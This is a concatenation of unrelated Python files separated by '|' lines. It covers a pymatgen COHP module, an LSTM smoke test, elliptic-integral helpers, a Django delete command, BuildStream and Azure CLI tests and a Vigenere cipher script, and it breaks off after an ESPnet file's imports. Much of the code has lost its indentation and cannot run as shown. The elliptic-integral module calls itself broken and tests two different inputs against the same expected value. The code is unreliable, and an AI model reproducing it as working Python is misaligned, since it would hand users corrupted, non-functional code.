# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals
import six
import warnings
import numpy as np
from monty.json import MSONable
from pymatgen.electronic_structure.core import Spin, Orbital
from pymatgen.core.sites import PeriodicSite
from pymatgen.core.structure import Structure
from pymatgen.io.lmto import LMTOCopl
from pymatgen.io.lobster import Cohpcar
from pymatgen.util.num import round_to_sigfigs
from pymatgen.util.coord import get_linear_interpolated_value
"""
This module defines classes to represent crystal orbital Hamilton
populations (COHP) and integrated COHP (ICOHP), but can also be used
for crystal orbital overlap populations (COOP).
"""
__author__ = "Marco Esters"
__copyright__ = "Copyright 2017, The Materials Project"
__version__ = "0.2"
__maintainer__ = "Marco Esters"
__email__ = "esters@uoregon.edu"
__date__ = "Dec 13, 2017"
class Cohp(MSONable):
"""
Basic COHP object.
Args/attributes:
are_coops: Indicates whether this object describes COHPs or COOPs.
efermi: Fermi energy.
energies: A sequence of energies.
cohp ({Spin: np.array}): representing the COHP for each spin.
icohp ({Spin: np.array}): representing the ICOHP for each spin.
"""
def __init__(self, efermi, energies, cohp, are_coops=False, icohp=None):
self.are_coops = are_coops
self.efermi = efermi
self.energies = np.array(energies)
self.cohp = cohp
self.icohp = icohp
def __add__(self, other):
"""
        Adds two COHP objects together. Checks that the energy scales are
        the same; otherwise a ValueError is raised. ICOHPs are also added
        if present in both objects. If ICOHP is only present in one object,
        a warning is displayed and ICOHP is not added.
Args:
other: Another COHP object.
Returns:
Sum of the two COHPs as a COHP object.
"""
if not all(np.equal(self.energies, other.energies)):
raise ValueError("Energies of both COHP are not compatible.")
        populations = {spin: self.cohp[spin] + other.cohp[spin]
                       for spin in self.cohp}
if self.icohp is not None and other.icohp is not None:
int_pop = {spin: self.icohp[spin] + other.icohp[spin]
for spin in self.icohp}
else:
if self.icohp is not None or other.icohp is not None:
warnings.warn("One of the COHP objects does not contain "
"ICOHPs. Setting ICOHP to None.")
int_pop = None
        return Cohp(self.efermi, self.energies, populations,
                    are_coops=self.are_coops, icohp=int_pop)
def __repr__(self):
return self.__str__()
def __str__(self):
"""
Returns a string that can be easily plotted (e.g. using gnuplot).
"""
cohpstring = "COOP" if self.are_coops else "COHP"
header = ["Energy", cohpstring + "Up"]
data = [self.energies, self.cohp[Spin.up]]
if Spin.down in self.cohp:
header.append(cohpstring + "Down")
data.append(self.cohp[Spin.down])
if self.icohp:
header.append("I" + cohpstring + "Up")
data.append(self.icohp[Spin.up])
if Spin.down in self.cohp:
header.append("I" + cohpstring + "Down")
data.append(self.icohp[Spin.down])
formatheader = "#" + " ".join(["{:15s}" for __ in header])
formatdata = " ".join(["{:.5f}" for __ in header])
stringarray = [formatheader.format(*header)]
for i, __ in enumerate(self.energies):
stringarray.append(formatdata.format(*[d[i] for d in data]))
return "\n".join(stringarray)
def as_dict(self):
"""
Json-serializable dict representation of COHP.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"are_coops": self.are_coops,
"efermi": self.efermi,
"energies": self.energies.tolist(),
"COHP": {str(spin): pops.tolist()
for spin, pops in self.cohp.items()}}
if self.icohp:
d["ICOHP"] = {str(spin): pops.tolist()
for spin, pops in self.icohp.items()}
return d
def get_cohp(self, spin=None, integrated=False):
"""
Returns the COHP or ICOHP for a particular spin.
Args:
            spin: Spin. Can be a Spin object, an integer (-1/1),
                or a str ("up"/"down").
integrated: Return COHP (False) or ICOHP (True)
Returns:
            The COHP or ICOHP for the given spin. If spin is
            None and both spins are present, both spins will be returned
            as a dictionary.
"""
if not integrated:
populations = self.cohp
else:
populations = self.icohp
if populations is None:
return None
elif spin is None:
return populations
else:
if isinstance(spin, six.integer_types):
spin = Spin(spin)
elif isinstance(spin, six.string_types):
s = {"up": 1, "down": -1}[spin.lower()]
spin = Spin(s)
return {spin: populations[spin]}
def get_icohp(self, spin=None):
"""
Convenient alternative to get the ICOHP for a particular spin.
"""
return self.get_cohp(spin=spin, integrated=True)
def get_interpolated_value(self, energy, integrated=False):
"""
Returns the COHP for a particular energy.
Args:
            energy: Energy to return the COHP value for.
            integrated: Return COHP (False) or ICOHP (True).
"""
inter = {}
for spin in self.cohp:
if not integrated:
inter[spin] = get_linear_interpolated_value(self.energies,
self.cohp[spin],
energy)
elif self.icohp is not None:
inter[spin] = get_linear_interpolated_value(self.energies,
self.icohp[spin],
energy)
else:
raise ValueError("ICOHP is empty.")
return inter
@classmethod
def from_dict(cls, d):
"""
Returns a COHP object from a dict representation of the COHP.
"""
if "ICOHP" in d:
icohp = {Spin(int(key)): np.array(val)
for key, val in d["ICOHP"].items()}
else:
icohp = None
return Cohp(d["efermi"], d["energies"],
{Spin(int(key)): np.array(val)
for key, val in d["COHP"].items()},
icohp=icohp, are_coops=d["are_coops"])
class CompleteCohp(Cohp):
"""
A wrapper class that defines an average COHP, and individual COHPs.
Args:
        structure: Structure associated with this COHP.
avg_cohp: The average cohp as a COHP object.
cohps: A dict of COHP objects for individual bonds of the form
{label: COHP}
bonds: A dict containing information on the bonds of the form
{label: {key: val}}. The key-val pair can be any information
the user wants to put in, but typically contains the sites,
the bond length, and the number of bonds. If nothing is
supplied, it will default to an empty dict.
        are_coops: Indicates whether the Cohp objects are COHPs or COOPs.
            Defaults to False for COHPs.
orb_res_cohp: Orbital-resolved COHPs.
.. attribute: are_coops
        Indicates whether the object describes COOPs or COHPs.
.. attribute: efermi
Fermi energy
.. attribute: energies
Sequence of energies
.. attribute: structure
Structure associated with the COHPs.
.. attribute: cohp, icohp
The average COHP/ICOHP.
.. attribute: all_cohps
A dict of COHPs for individual bonds of the form {label: COHP}
.. attribute: orb_res_cohp
Orbital-resolved COHPs.
"""
def __init__(self, structure, avg_cohp, cohp_dict, bonds=None,
are_coops=False, orb_res_cohp=None):
super(CompleteCohp, self).__init__(avg_cohp.efermi,
avg_cohp.energies,
avg_cohp.cohp,
are_coops=are_coops,
icohp=avg_cohp.icohp)
self.structure = structure
self.are_coops = are_coops
self.all_cohps = cohp_dict
self.orb_res_cohp = orb_res_cohp
if bonds is None:
self.bonds = {label: {} for label in self.all_cohps.keys()}
else:
self.bonds = bonds
def __str__(self):
if self.are_coops:
return "Complete COOPs for " + str(self.structure)
else:
return "Complete COHPs for " + str(self.structure)
def as_dict(self):
"""
Json-serializable dict representation of CompleteCohp.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"are_coops": self.are_coops,
"efermi": self.efermi,
"structure": self.structure.as_dict(),
"energies": self.energies.tolist(),
"COHP": {"average": {str(spin): pops.tolist()
for spin, pops in
self.cohp.items()}}}
if self.icohp is not None:
d["ICOHP"] = {"average": {str(spin): pops.tolist()
for spin, pops in
self.icohp.items()}}
for label in self.all_cohps.keys():
d["COHP"].update({label: {str(spin): pops.tolist()
for spin, pops in
self.all_cohps[label].cohp.items()}})
if self.all_cohps[label].icohp is not None:
if "ICOHP" not in d.keys():
d["ICOHP"] = {label: {str(spin): pops.tolist()
for spin, pops in
self.all_cohps[label].icohp.items()}}
else:
d["ICOHP"].update({label: {str(spin): pops.tolist()
for spin, pops in
self.all_cohps[label].icohp.items()}})
if False in [bond_dict == {} for bond_dict in self.bonds.values()]:
d["bonds"] = {bond: {"length": self.bonds[bond]["length"],
"sites": [site.as_dict() for site
in self.bonds[bond]["sites"]]}
for bond in self.bonds}
if self.orb_res_cohp:
orb_dict = {}
for label in self.orb_res_cohp:
orb_dict[label] = {}
for orbs in self.orb_res_cohp[label]:
cohp = {str(spin): pops.tolist() for spin, pops in
self.orb_res_cohp[label][orbs]["COHP"].items()}
orb_dict[label][orbs] = {"COHP": cohp}
icohp = {str(spin): pops.tolist() for spin, pops in
self.orb_res_cohp[label][orbs]["ICOHP"].items()}
orb_dict[label][orbs]["ICOHP"] = icohp
orbitals = [[orb[0], orb[1].name] for orb in
self.orb_res_cohp[label][orbs]["orbitals"]]
orb_dict[label][orbs]["orbitals"] = orbitals
d["orb_res_cohp"] = orb_dict
return d
def get_cohp(self, label, spin=None, integrated=False):
"""
Get specific COHP or ICOHP. If label is not in the COHP labels,
try reversing the order of the sites.
        Args:
            label: Bond label of the COHP to return, or "average" for the
                average COHP.
            spin: Spin. Can be a Spin object, an integer (-1/1),
                or a str ("up"/"down").
            integrated: Return COHP (False) or ICOHP (True)
        Returns:
            The COHP or ICOHP for the given label and spin. If spin is
            None and both spins are present, both spins will be returned
            as a dictionary.
"""
        if label.lower() == "average":
            return super(CompleteCohp, self).get_cohp(spin=spin,
                                                      integrated=integrated)
else:
try:
return self.all_cohps[label].get_cohp(spin=spin,
integrated=integrated)
except KeyError:
atoms = label.split("-")
label = atoms[1] + "-" + atoms[0]
return self.all_cohps[label].get_cohp(spin=spin,
integrated=integrated)
def get_icohp(self, label, spin=None):
"""
Convenient alternative to get a specific ICOHP.
"""
return self.get_cohp(label, spin=spin, integrated=True)
def get_orbital_resolved_cohp(self, label, orbitals):
"""
Get orbital-resolved COHP.
Args:
label: bond label.
orbitals: The orbitals as a label, or list or tuple of the form
[(n1, orbital1), (n2, orbital2)]. Orbitals can either be str,
int, or Orbital.
Returns:
A Cohp object if CompleteCohp contains orbital-resolved cohp,
or None if it doesn't.
Note: It currently assumes that orbitals are str if they aren't the
other valid types. This is not ideal, but the easiest way to
avoid unicode issues between python 2 and python 3.
"""
if self.orb_res_cohp is None:
return None
elif isinstance(orbitals, list) or isinstance(orbitals, tuple):
cohp_orbs = [d["orbitals"] for d in
self.orb_res_cohp[label].values()]
orbs = []
for orbital in orbitals:
if isinstance(orbital[1], int):
orbs.append(tuple((orbital[0], Orbital(orbital[1]))))
elif isinstance(orbital[1], Orbital):
orbs.append(tuple((orbital[0], orbital[1])))
elif isinstance(orbital[1], six.string_types):
orbs.append(tuple((orbital[0], Orbital[orbital[1]])))
else:
raise TypeError("Orbital must be str, int, or Orbital.")
orb_index = cohp_orbs.index(orbs)
orb_label = list(self.orb_res_cohp[label].keys())[orb_index]
elif isinstance(orbitals, six.string_types):
orb_label = orbitals
else:
raise TypeError("Orbitals must be str, list, or tuple.")
try:
icohp = self.orb_res_cohp[label][orb_label]["ICOHP"]
except KeyError:
icohp = None
return Cohp(self.efermi, self.energies,
self.orb_res_cohp[label][orb_label]["COHP"],
icohp=icohp, are_coops=self.are_coops)
@classmethod
def from_dict(cls, d):
"""
Returns CompleteCohp object from dict representation.
"""
cohp_dict = {}
efermi = d["efermi"]
energies = d["energies"]
structure = Structure.from_dict(d["structure"])
if "bonds" in d.keys():
bonds = {bond: {"length": d["bonds"][bond]["length"],
"sites": tuple(PeriodicSite.from_dict(site)
for site in d["bonds"][bond]["sites"])}
for bond in d["bonds"]}
else:
bonds = None
for label in d["COHP"]:
cohp = {Spin(int(spin)): np.array(d["COHP"][label][spin])
for spin in d["COHP"][label]}
try:
icohp = {Spin(int(spin)): np.array(d["ICOHP"][label][spin])
for spin in d["ICOHP"][label]}
except KeyError:
icohp = None
if label == "average":
avg_cohp = Cohp(efermi, energies, cohp, icohp=icohp)
else:
cohp_dict[label] = Cohp(efermi, energies, cohp, icohp=icohp)
if "orb_res_cohp" in d.keys():
orb_cohp = {}
for label in d["orb_res_cohp"]:
orb_cohp[label] = {}
for orb in d["orb_res_cohp"][label]:
cohp = {Spin(int(s)): np.array(
d["orb_res_cohp"][label][orb]["COHP"][s],
dtype=float)
for s in d["orb_res_cohp"][label][orb]["COHP"]}
try:
icohp = {Spin(int(s)): np.array(
d["orb_res_cohp"][label][orb]["ICOHP"][s],
dtype=float)
for s in d["orb_res_cohp"][label][orb]["ICOHP"]}
except KeyError:
icohp = None
orbitals = [tuple((int(o[0]), Orbital[o[1]])) for o in
d["orb_res_cohp"][label][orb]["orbitals"]]
orb_cohp[label][orb] = {"COHP": cohp, "ICOHP": icohp,
"orbitals": orbitals}
# If no total COHPs are present, calculate the total
# COHPs from the single-orbital populations. Total COHPs
# may not be present when the cohpgenerator keyword is used
# in LOBSTER versions 2.2.0 and earlier.
if label not in d["COHP"] or d["COHP"][label] is None:
cohp = {Spin.up: np.sum(np.array(
[orb_cohp[label][orb]["COHP"][Spin.up]
for orb in orb_cohp[label]]), axis=0)}
try:
cohp[Spin.down] = np.sum(np.array(
[orb_cohp[label][orb]["COHP"][Spin.down]
for orb in orb_cohp[label]]), axis=0)
except KeyError:
pass
                orb_res_icohp = None not in [orb_cohp[label][orb]["ICOHP"]
                                             for orb in orb_cohp[label]]
if (label not in d["ICOHP"] or
d["ICOHP"][label] is None) and orb_res_icohp:
icohp = {Spin.up: np.sum(np.array(
[orb_cohp[label][orb]["ICOHP"][Spin.up]
for orb in orb_cohp[label]]), axis=0)}
try:
icohp[Spin.down] = np.sum(np.array(
[orb_cohp[label][orb]["ICOHP"][Spin.down]
for orb in orb_cohp[label]]), axis=0)
except KeyError:
pass
else:
orb_cohp = None
if "average" not in d["COHP"].keys():
# calculate average
cohp = np.array([np.array(c)
for c in d["COHP"].values()]).mean(axis=0)
try:
icohp = np.array([np.array(c)
for c in d["ICOHP"].values()]).mean(axis=0)
except KeyError:
icohp = None
avg_cohp = Cohp(efermi, energies, cohp, icohp=icohp)
return CompleteCohp(structure, avg_cohp, cohp_dict, bonds=bonds,
are_coops=d["are_coops"], orb_res_cohp=orb_cohp)
@classmethod
def from_file(cls, fmt, filename=None,
structure_file=None, are_coops=False):
"""
Creates a CompleteCohp object from an output file of a COHP
calculation. Valid formats are either LMTO (for the Stuttgart
LMTO-ASA code) or LOBSTER (for the LOBSTER code).
Args:
            filename: Name of the COHP output file. Defaults to COPL
                for LMTO and COHPCAR.lobster/COOPCAR.lobster for LOBSTER.
are_coops: Indicates whether the populations are COOPs or
COHPs. Defaults to False for COHPs.
fmt: A string for the code that was used to calculate
the COHPs so that the output file can be handled
correctly. Can take the values "LMTO" or "LOBSTER".
structure_file: Name of the file containing the structure.
If no file name is given, use CTRL for LMTO and POSCAR
for LOBSTER.
Returns:
A CompleteCohp object.
"""
fmt = fmt.upper()
if fmt == "LMTO":
# LMTO COOPs and orbital-resolved COHP cannot be handled yet.
are_coops = False
orb_res_cohp = None
if structure_file is None:
structure_file = "CTRL"
if filename is None:
filename = "COPL"
cohp_file = LMTOCopl(filename=filename, to_eV=True)
elif fmt == "LOBSTER":
if structure_file is None:
structure_file = "POSCAR"
if filename is None:
filename = "COOPCAR.lobster" if are_coops \
else "COHPCAR.lobster"
cohp_file = Cohpcar(filename=filename, are_coops=are_coops)
orb_res_cohp = cohp_file.orb_res_cohp
else:
raise ValueError("Unknown format %s. Valid formats are LMTO "
"and LOBSTER." % fmt)
structure = Structure.from_file(structure_file)
efermi = cohp_file.efermi
cohp_data = cohp_file.cohp_data
energies = cohp_file.energies
# Lobster shifts the energies so that the Fermi energy is at zero.
# Shifting should be done by the plotter object though.
spins = [Spin.up, Spin.down] if cohp_file.is_spin_polarized \
else [Spin.up]
if fmt == "LOBSTER":
energies += efermi
if orb_res_cohp is not None:
# If no total COHPs are present, calculate the total
# COHPs from the single-orbital populations. Total COHPs
# may not be present when the cohpgenerator keyword is used
# in LOBSTER versions 2.2.0 and earlier.
for label in orb_res_cohp:
if cohp_file.cohp_data[label]["COHP"] is None:
cohp_data[label]["COHP"] = \
{sp: np.sum([orb_res_cohp[label][orbs]["COHP"][sp]
for orbs in orb_res_cohp[label]],
axis=0) for sp in spins}
if cohp_file.cohp_data[label]["ICOHP"] is None:
cohp_data[label]["ICOHP"] = \
{sp: np.sum([orb_res_cohp[label][orbs]["ICOHP"][sp]
for orbs in orb_res_cohp[label]],
axis=0) for sp in spins}
if fmt == "LMTO":
# Calculate the average COHP for the LMTO file to be
# consistent with LOBSTER output.
avg_data = {"COHP": {}, "ICOHP": {}}
for i in avg_data:
for spin in spins:
rows = np.array([cohp_data[label][i][spin]
for label in cohp_data])
avg = np.average(rows, axis=0)
# LMTO COHPs have 5 significant figures
avg_data[i].update({spin:
np.array([round_to_sigfigs(a, 5)
for a in avg],
dtype=float)})
avg_cohp = Cohp(efermi, energies,
avg_data["COHP"],
icohp=avg_data["ICOHP"])
else:
            avg_cohp = Cohp(efermi, energies,
                            cohp_data["average"]["COHP"],
                            icohp=cohp_data["average"]["ICOHP"],
                            are_coops=are_coops)
del cohp_data["average"]
cohp_dict = {label: Cohp(efermi, energies,
cohp_data[label]["COHP"],
icohp=cohp_data[label]["ICOHP"],
are_coops=are_coops)
for label in cohp_data}
bond_dict = {label: {"length": cohp_data[label]["length"],
"sites": [structure.sites[site]
for site in cohp_data[label]["sites"]]}
for label in cohp_data}
return CompleteCohp(structure, avg_cohp, cohp_dict, bonds=bond_dict,
are_coops=are_coops, orb_res_cohp=orb_res_cohp)
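# A minimal usage sketch (not part of the library): it assumes LOBSTER output files
# COHPCAR.lobster and POSCAR exist in the working directory and that "1" is a valid
# bond label in that COHPCAR -- both are assumptions, not guaranteed by this module.
#
#     complete_cohp = CompleteCohp.from_file("LOBSTER", filename="COHPCAR.lobster",
#                                            structure_file="POSCAR")
#     avg_up = complete_cohp.get_cohp("average", spin=Spin.up)  # spin-up average COHP
#     icohp_1 = complete_cohp.get_icohp("1")                    # ICOHP for bond label "1"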
|
#!/usr/bin/env python
import torch as th
from torch import Tensor as T
from torch.autograd import Variable as V
from lstms import LayerNorm, LSTM, LayerNormLSTM
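# Quick smoke test: apply LayerNorm (non-learnable, then learnable) to a random
# 1x1x5 tensor, print the learnable parameters, and run one step of the custom LSTM.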
if __name__ == '__main__':
th.manual_seed(1234)
# vec = T(1, 1, 5).fill_(1.0)
vec = V(th.rand(1, 1, 5))
ln = LayerNorm(5, learnable=False)
print(ln(vec))
ln = LayerNorm(5, learnable=True)
print(ln(vec))
for p in ln.parameters():
print(p)
lstm = LSTM(5, 5)
    out, (h_n, c_n) = lstm(ln(vec), (vec, vec))
    print(out)
|
import math
import unittest

MEAN_TOLERANCE = 1.e-10
def ag_mean(a,b,tolerance):
'''
Computes arithmetic-geometric mean of A and B
https://scipython.com/book/chapter-2-the-core-python-language-i/questions/the-arithmetic-geometric-mean/
'''
while abs(a-b) > tolerance:
a, b = (a + b) / 2.0, math.sqrt(a * b)
return b
def first_kind_elliptic_integral(k):
'''
    Calculate the complete elliptic integral of the first kind, K(k).
https://dlmf.nist.gov/19
§19.8(i) Gauss’s Arithmetic-Geometric Mean (AGM)
'''
return (math.pi/2.0)/ag_mean(1,math.sqrt(1.0-(k**2.0)), MEAN_TOLERANCE)
def compute_big_M(m):
'''
Prerequisite for E(m)
'''
return (math.pi/(2.0*first_kind_elliptic_integral(m)*math.sqrt(1-m**2.0)))
def compute_delta(m):
'''
Prerequisite for E(m)
'''
return (1.0/math.sqrt(1.0-(m**2.0)))
def differentiate_delta_over_M(m):
'''
Another prerequisite for E(m)
Numerically differentiate the quotient delta/M
'''
dm=1.0e-6
return (((compute_delta(m+dm)/compute_big_M(m+dm))-(compute_delta(m)/compute_big_M(m)))/dm)
def second_kind_elliptic_integral(m):
'''
Calculate E(m)inem
E says blow, we increase emittance
receive remittance
percieve:
society's been enhanced
oh we got them in a trance
science's now advanced
in common parlance:
dance
From @ kurzweg2012
Efficiency could be improved by eliminating duplicate calls of big_M and compute_delta(m)
Currently slightly broken.
'''
return (math.pi/2.0)/((1.0/(compute_big_M(m)*compute_delta(m))) + (m*differentiate_delta_over_M(m)))
class TestAll(unittest.TestCase):
def test_ag_mean(self):
self.assertAlmostEqual(ag_mean(24,6,1e-7), 13.458, places=3)
def test_first_kind_elliptic_integral(self):
self.assertAlmostEqual(first_kind_elliptic_integral(0.5), 1.685751, places=3)
self.assertAlmostEqual(first_kind_elliptic_integral(0), 1.57079632, places=3)
def test_big_M(self):
self.assertAlmostEqual(compute_big_M(0.5), 1.07595, places=3)
def test_differentiate_delta_over_M(self):
self.assertAlmostEqual(differentiate_delta_over_M(0), 1.6, places=3)
self.assertAlmostEqual(differentiate_delta_over_M(0.9), 1.6, places=3)
def test_second_kind_elliptic_integral(self):
self.assertAlmostEqual(second_kind_elliptic_integral(0), 1.5707963, places=3)
self.assertAlmostEqual(second_kind_elliptic_integral(0.9), 1.15, places=3)
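# Quick self-check (a sketch): K(0) reduces to pi/2 exactly because agm(1, 1) = 1,
# and K(0.5) should match the tabulated value used in the tests above. Running the
# module then executes the TestAll suite (note the docstring above flags E(m) as
# slightly broken, so that test may fail).
if __name__ == '__main__':
    print('K(0)   =', first_kind_elliptic_integral(0.0))   # expect ~1.5707963
    print('K(0.5) =', first_kind_elliptic_integral(0.5))   # expect ~1.6857504
    unittest.main()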
|
from django.core.management.base import BaseCommand, CommandError
from TaskScheduler.models import Blocked
from prompt_toolkit import prompt
from datetime import datetime
import pytz
# from prompt_toolkit.contrib.completers import WordCompleter
class Command(BaseCommand):
    help = 'Deletes blocked entries by id or name'
def add_arguments(self, parser):
parser.add_argument('type', nargs='+', type=str)
parser.add_argument('filter_value', nargs='+', type=str)
print()
def handle(self, *args, **options):
for option in options["type"]:
if option == "id":
for blocked_id in options["filter_value"]:
b = Blocked.objects.get(pk=int(blocked_id))
delete = prompt("> Delete? (y-yes)")
if delete == "y" or delete == "Y":
print("Deleting blocked!")
b.delete()
elif option == "name":
for name in options["filter_value"]:
blocked = Blocked.objects.all().filter(name=name)
for b in blocked:
delete = prompt("> Delete"+b.name+", id: "+str(b.id)+"? (y-yes)")
if delete == "y" or delete == "Y":
print("Deleting blocked!")
b.delete()
self.stdout.write(self.style.SUCCESS("Successfully deleted blocked"))
|
from hacker.settings import USERNAME
print(USERNAME[::-1])
|
# Pylint doesn't play well with fixtures and dependency injection from pytest
# pylint: disable=redefined-outer-name
import os
import pytest
from buildstream.exceptions import ErrorDomain, LoadErrorReason
from buildstream._testing.runcli import cli # pylint: disable=unused-import
# Project directory
DATA_DIR = os.path.dirname(os.path.realpath(__file__))
@pytest.mark.datafiles(DATA_DIR)
def test_project_error(cli, datafiles):
project = os.path.join(datafiles.dirname, datafiles.basename, "list-directive-error-project")
result = cli.run(
project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", "element.bst"]
)
result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.TRAILING_LIST_DIRECTIVE)
@pytest.mark.datafiles(DATA_DIR)
@pytest.mark.parametrize("target", [("variables.bst"), ("environment.bst"), ("config.bst"), ("public.bst")])
def test_element_error(cli, datafiles, target):
project = os.path.join(datafiles.dirname, datafiles.basename, "list-directive-error-element")
result = cli.run(project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", target])
result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.TRAILING_LIST_DIRECTIVE)
@pytest.mark.datafiles(DATA_DIR)
def test_project_composite_error(cli, datafiles):
project = os.path.join(datafiles.dirname, datafiles.basename, "list-directive-type-error")
result = cli.run(
project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", "element.bst"]
)
result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.ILLEGAL_COMPOSITE)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import tempfile
import unittest
from unittest.mock import MagicMock
from azure.cli.testsdk import ScenarioTest, LocalContextScenarioTest
from knack.util import CLIError
class ConfigTest(ScenarioTest):
def test_config(self):
# [test_section1]
# test_option1 = test_value1
#
# [test_section2]
# test_option21 = test_value21
# test_option22 = test_value22
# C:\Users\{username}\AppData\Local\Temp
tempdir = tempfile.gettempdir()
original_path = os.getcwd()
os.chdir(tempdir)
print("Using temp dir: {}".format(tempdir))
global_test_args = {"source": os.path.expanduser(os.path.join('~', '.azure', 'config')), "flag": ""}
local_test_args = {"source": os.path.join(tempdir, '.azure', 'config'), "flag": " --local"}
for args in (global_test_args, local_test_args):
test_option1_expected = {'name': 'test_option1', 'source': args["source"], 'value': 'test_value1'}
test_option21_expected = {'name': 'test_option21', 'source': args["source"], 'value': 'test_value21'}
test_option22_expected = {'name': 'test_option22', 'source': args["source"], 'value': 'test_value22'}
test_section1_expected = [test_option1_expected]
test_section2_expected = [test_option21_expected, test_option22_expected]
# 1. set
# Test setting one option
self.cmd('config set test_section1.test_option1=test_value1' + args['flag'])
# Test setting multiple options
self.cmd('config set test_section2.test_option21=test_value21 test_section2.test_option22=test_value22' + args['flag'])
# 2. get
# 2.1 Test get all sections
output = self.cmd('config get' + args['flag']).get_output_in_json()
self.assertListEqual(output['test_section1'], test_section1_expected)
self.assertListEqual(output['test_section2'], test_section2_expected)
# 2.2 Test get one section
output = self.cmd('config get test_section1' + args['flag']).get_output_in_json()
self.assertListEqual(output, test_section1_expected)
output = self.cmd('config get test_section2' + args['flag']).get_output_in_json()
self.assertListEqual(output, test_section2_expected)
# 2.3 Test get one item
output = self.cmd('config get test_section1.test_option1' + args['flag']).get_output_in_json()
self.assertDictEqual(output, test_option1_expected)
output = self.cmd('config get test_section2.test_option21' + args['flag']).get_output_in_json()
self.assertDictEqual(output, test_option21_expected)
output = self.cmd('config get test_section2.test_option22' + args['flag']).get_output_in_json()
self.assertDictEqual(output, test_option22_expected)
with self.assertRaises(CLIError):
self.cmd('config get test_section1.test_option22' + args['flag'])
# 3. unset
# Test unsetting one option
self.cmd('config unset test_section1.test_option1' + args['flag'])
# Test unsetting multiple options
self.cmd('config unset test_section2.test_option21 test_section2.test_option22' + args['flag'])
os.chdir(original_path)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
'''
VIGENERE SQUARE:
a b c d e f g h i j k l m n o p q r s t u v w x y z
b c d e f g h i j k l m n o p q r s t u v w x y z a
c d e f g h i j k l m n o p q r s t u v w x y z a b
d e f g h i j k l m n o p q r s t u v w x y z a b c
e f g h i j k l m n o p q r s t u v w x y z a b c d
f g h i j k l m n o p q r s t u v w x y z a b c d e
g h i j k l m n o p q r s t u v w x y z a b c d e f
h i j k l m n o p q r s t u v w x y z a b c d e f g
i j k l m n o p q r s t u v w x y z a b c d e f g h
j k l m n o p q r s t u v w x y z a b c d e f g h i
k l m n o p q r s t u v w x y z a b c d e f g h i j
l m n o p q r s t u v w x y z a b c d e f g h i j k
m n o p q r s t u v w x y z a b c d e f g h i j k l
n o p q r s t u v w x y z a b c d e f g h i j k l m
o p q r s t u v w x y z a b c d e f g h i j k l m n
p q r s t u v w x y z a b c d e f g h i j k l m n o
q r s t u v w x y z a b c d e f g h i j k l m n o p
r s t u v w x y z a b c d e f g h i j k l m n o p q
s t u v w x y z a b c d e f g h i j k l m n o p q r
t u v w x y z a b c d e f g h i j k l m n o p q r s
u v w x y z a b c d e f g h i j k l m n o p q r s t
v w x y z a b c d e f g h i j k l m n o p q r s t u
w x y z a b c d e f g h i j k l m n o p q r s t u v
x y z a b c d e f g h i j k l m n o p q r s t u v w
y z a b c d e f g h i j k l m n o p q r s t u v w x
z a b c d e f g h i j k l m n o p q r s t u v w x y
'''
import sys
import argparse
def main():
args = get_args()
final = vigenere_shift(args)
    print(final)
def clean(message, key):
'''
Clean our message and key so they're pretty.
    :param str message: text to clean; non-letters are stripped and case is lowered
    :param str key: keyword to clean; returned as a list of character ordinals
'''
dirty_text = list(message) # [97-122]
dirty_key = list(key)
def num_det(letter):
if ord(letter.lower()) >= 97 and ord(letter.lower()) <= 122:
return letter.lower()
else:
return ''
clean_text = ''.join([num_det(char) for char in dirty_text])
clean_key = [ord(character) for character in
list(''.join([num_det(char) for char in dirty_key]))]
return clean_text, clean_key
def vigenere_shift(args):
'''
Shift our message and return
    :param argparse.Namespace args: parsed arguments (message, key, decrypt)
'''
clean_text, clean_key = clean(args.message, args.key)
letter = 0
ciphertext = ''
for byte in clean_text:
chr_enc = shift_byte(byte, clean_key[letter], args.decrypt)
ciphertext += chr_enc
letter = (letter + 1) % len(clean_key) # Cycle keyword
return ciphertext
def shift_byte(byte, shift, decrypt):
'''
Shift our byte using the correct alphabet in the correct direction
    :param str byte: the character to shift
    :param int shift: ordinal of the key character to shift by
    :param bool decrypt: shift backwards when True
'''
nRangeByte = (ord(byte) + 7) % 26
nRangeShift = (shift + 7) % 26
if decrypt:
encoded_byte = chr(((nRangeByte - nRangeShift) % 26) + 97)
else:
encoded_byte = chr(((nRangeByte + nRangeShift) % 26) + 97)
return encoded_byte
def get_args():
default_message = 'The Quick Brown fox lept Over THE lazy dog'
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--encrypt',
action='store_true',
help='Encrypt')
parser.add_argument('-d', '--decrypt',
action='store_true',
help='Decrypt')
parser.add_argument('-k', '--key',
type=str, default='Ki5Ng',
help='The keyword for encryption or decryption')
parser.add_argument('-f', '--filename',
type=str, default=None,
help='This is the name of the read/write file')
parser.add_argument('-m', '--message',
type=str,
default=default_message,
help='Message to encode')
args = parser.parse_args()
if args.encrypt is False and args.decrypt is False:
args.encrypt = True
if args.decrypt and args.message is default_message:
args.message = 'dprweqpqlzbcxnbdvmczydrxdprrkhljyo'
if args.filename:
args.message = open(args.filename, 'r').read()
return args
if __name__ == "__main__":
sys.exit(main())
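# Illustrative run (assuming this file is saved as vigenere.py): the classic
# key/plaintext pair
#     python vigenere.py -e -k lemon -m "attack at dawn"
# is cleaned to "lemon" / "attackatdawn" and encrypts to "lxfopvefrnhr".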
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 Hang Le (hangtp.le@gmail.com)
"""Dual-decoder definition."""
import logging
import torch
from torch import nn
from espnet.nets.pytorch_backend.transformer.attention import MultiHeadedAttention
from espnet.nets.pytorch_backend.transformer.decoder_layer_dual import DualDecoderLayer
from espnet.nets.pytorch_backend.transformer.embedding import PositionalEncoding
from espnet.nets.pytorch_backend.transformer.layer_norm import LayerNorm
from espnet.nets.pytorch_backend.transformer.mask import subsequent_mask
